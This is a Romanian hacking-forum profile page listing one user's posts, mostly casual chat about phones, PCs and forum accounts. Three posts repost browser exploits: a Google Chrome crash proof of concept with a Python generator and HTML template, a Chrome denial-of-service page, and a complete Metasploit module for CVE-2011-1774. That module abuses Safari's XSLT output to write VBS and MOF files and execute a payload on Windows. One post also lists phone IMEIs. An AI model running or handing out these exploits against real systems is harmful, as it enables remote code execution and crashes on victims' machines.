Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. Mersi mult! +rep!
  2. 1. Vodafone 543 @ Vodafone Spania IMEI: 359820037427307 provider id: 543x-2AVDES1-4 2-Vodafone 543@ Vodafone Romania IMEI: 359820031998659 provider id: 543x-2AVDRO1-4
  3. bine ai venit.Cunostinte?mai scoate din emoticoane
  4. Am si eu un Vodafone 543 care din ce se vede ar fi un Alcatel.Se poate decoda astfel?
  5. fail in plm ) ps: scoate dracu sorcova aia de la semnatura...imi crapa retina (imaginea poti s-o lasi[desi ti-a iesit nasol rau, layere puse aiurea etc]da' nu mi scrie toate idioteniile) sorry de off
  6. CantarStrake joci?daca nu n-ai multe sanse. bun venit...
  7. DA! De ce?Comunisti am fost ->failed _____Capitalisti suntem ->''failing'' deci hai in plm sa o facem si pe asta:))o schimba dracu ceva sau macar ne mindrim ca suntem 3in1 cacafeaua
  8. ## _ (`-') _ pigtail23 (`-') (`-') _ _ remoteshell.de ## ## \-.(OO ) (_) .-> ( OO).-> (OO ).-/ (_) <-. ## ## _.' \ ,-(`-') ,---(`-')/ '._ / ,---. ,-(`-'),--. ) .----. .----. ## ##(_...--'' | ( OO)' .-(OO )|'--...__)| \ /`.\ | ( OO)| (`-')\_,-. |\_.-, | ## ##| |_.' | | | )| | .-, \`--. .--''-'|_.' | | | )| |OO ) .' .' |_ < ## ##| .___.'(| |_/ | | '.(_/ | | (| .-. |(| |_/(| '__ | .' /_ .-. \ | ## ##| | | |'->| '-' | | | | | | | | |'->| |'| |\ `-' / ## ##`--' `--' `-----' `--' `--' `--' `--' `-----' `------' `---'' ## ################################################################################### ################################################################################### October 22, 2011 Ohh nice! What u doing google? Thx 4 ur bug! 0__o Google Chrome PoC, killing thread. Exploitable or only a DOS!? Found no way to exploit it. Good Luck!!! Testsystem: WinXP SP3, Win7(64 bit) Google Chrome version: 14.0.835.202 Greetings to: mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,... TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net ################################################################################### poc.html: too big! ################################################################################### Python script for debugging: #!/usr/bin/python filename = 'poc.html' content = open('template.html', 'r').read() buff = '$$*' * 36800 rc = 484 content2 = content[:rc] + buff + content[rc:] FILE = open(filename,"w") FILE.write(content2) FILE.close() template.html: <html> <body> <script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script> </body> </html> sursa
  9. /* GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | gggggg | Info-sec forum: Garage4hackers Forums - Home [+] Google Chrome Denial Of Service (DoS) [+] Author: Prashant a.k.a t3rm!n4t0r [+] C0ntact: happyterminator@gmail.com [+] Platform: Windows, *nix [+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04 [+] Special Greets to: "vinnu" and secfence team [+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r all hackers garage crew */ <html> <title>Download</title> <head> <script> function Lox() { var longunistring1 = unescape("%u4141?"); var longunistring2 = unescape("??"); var longunistring3 = unescape("??"); var longunistring4 = unescape("??"); for(i=0; i <= 100 ; ++i) { longunistring1+=longunistring1; longunistring2+=longunistring2; longunistring3+=longunistring3; longunistring4+=longunistring4; document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); } document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); } </script> </head> <body onLoad="Lox()"> </body> </html> Copyright 2011 - BugSearch About Us - Tell a Friend - Send sursa
  10. LLegoLLaS

    help ? :)

    ti-am dat pe pm un cont. Dai si tu un +rep
  11. da-mi pm cu idul
  12. Daca erau in plm mai mici sa le pui la chei asa ce fac cu ele.Si nu nu mi-a placut cum arata paralelipipedu ala si nici gangania (in revista ziceau CUB ).Useless.Am vazut si ARO ala, arata acceptabil
  13. Tableta - 8 Inch Touchscreen Android 2.2 (Froyo) 800MHZ CPU mi se pare cea mai ok ca si calitate. Ca si facilitati e mai ok prima
  14. ai conturi lfs.net / lfsforum.net sau lfsworld.net ?
  15. cin'te pune omule sa iei telefoane despre care nu stii nimic.Mai ales china. abonamentul banuiesc ca e destul de ok la 200 lei iti luai un Nokia E50 SH
  16. LLegoLLaS

    UPC internet

    n-ai ce sa faci nu mai scrie cu bold si italic
  17. curata-le si tu de praf.Schimba pasta termoconductoare de pe CPU si placa video,da-ti in bios un restore default.Daca ai sursa noname madeonship schimb-o
  18. pai si pe ''foicicile'' alea is astfel de idiotenii? (cauciuc,polistiren)?
  19. la mine inca n-au venit.Intrebarile astea prostesti care nu se noteaza pariez ca le pun ca ii mananca pe ei si au impresia ca is mnezo pe pamant ce idioti cum cacat sa intrebe de polistiren? intreaba si de cauciucuri de iarna?
  20. Daca n-ai atitudine ok ramai la cs; o sa ajungi zeu in calan ps: Vrei sa devii hacker?
  21. LLegoLLaS

    Salut

    da-ti un traceroute pe ipu tau sa vezi ce si cum. ps: cunostinte? (fie ele si de baza)
  22. in banii care ii dai pe 5730 (1000 ron) iti iei un android Eu nu ma pot dezlipi de qwerty fizic deci recomand htc chacha(black, 949 RON-pm pt magazin) si un brici sa scoti tasta fuxbook
  23. dau eu 2 invitatii moca xtremezone,una scenefz,2 iptorrents Bani iti iei doar pe torrentleech ps: tu ceri ~11 euro pe fiecare cont?
  24. ## # $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation', 'Description' => %q{ This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be acheived by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, 'License' => MSF_LICENSE, 'Author' => ['Nicolas Gregoire'], 'Version' => '$Revision: 13987 $', 'References' => [ ['CVE', '2011-1774'], ['OSVDB', '74017'], ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ #Windows before Vista [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 20 2011')) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Check target before attacking agent = request.headers['User-Agent'] if agent !~ /Windows NT 5\.1/ or agent !~ /Safari/ or agent !~ /Version\/5\.0\.\d/ print_error("This target isn't supported: #{agent.to_s}") send_not_found(cli) return end url = "http://" url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url += ":" + datastore['SRVPORT'] + get_resource() + "/" content = <<-EOS <?xml-stylesheet type="text/xml" href="#fragment"?> <!-- Define the DTD of the document This is needed, in order to later reference the XSLT stylesheet by a #fragment This trick allows to have both the XML and the XSL in the same file Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html --> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED >]> <doc> <!-- Define location and content of the files --> <mof> <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\#{@mof_name}]]></location> <content><![CDATA[#{@mof_content}]]></content> </mof><vbs> <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\#{@vbs_name}]]></location> <content><![CDATA[#{@vbs_content}]]></content> </vbs> <!-- The XSLT stylesheet header, including the "sx" extension --> <xsl:stylesheet id="fragment" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:sx="http://icl.com/saxon" extension-element-prefixes="sx" xmlns="http://www.w3.org/1999/xhtml" > <xsl:output method="xml" indent="yes" /> <!-- The XSLT template --> <xsl:template match="/"> <!-- Define some XSLT variables --> <xsl:variable name="moflocation" select="//mof/location/text()"/> <xsl:variable name="vbslocation" select="//vbs/location/text()"/> <!-- Create the files --> <sx:output file="{$vbslocation}" method="text"> <xsl:value-of select="//vbs/content"/> </sx:output> <sx:output file="{$moflocation}" method="text"> <xsl:value-of select="//mof/content"/> </sx:output> <!-- Some output to the browser --> <html> </html> </xsl:template> </xsl:stylesheet> </doc> EOS #Clear the extra tabs content = content.gsub(/^\t\t/, '') print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, content, {'Content-Type'=>'application/xml'}) handler(cli) end def exploit # In order to save binary data to the file system the payload is written to a VBS # file and execute it from there via a MOF @mof_name = rand_text_alpha(rand(5)+5) + ".mof" @vbs_name = rand_text_alpha(rand(5)+5) + ".vbs" print_status("Encoding payload into vbs...") payload = generate_payload_exe @vbs_content = Msf::Util::EXE.to_exe_vbs(payload) print_status("Generating mof file...") @mof_content = generate_mof(@mof_name, @vbs_name) super end end Copyright 2011 - BugSearch About Us - Tell a Friend - Send sursa
  25. Daca se intampla la noi acu eram bombardati .Asa suntem la cheremu' chinezilor(noi=restul lumii nu doar Romania).Isi ba pula de ce/cine vor
×
×
  • Create New...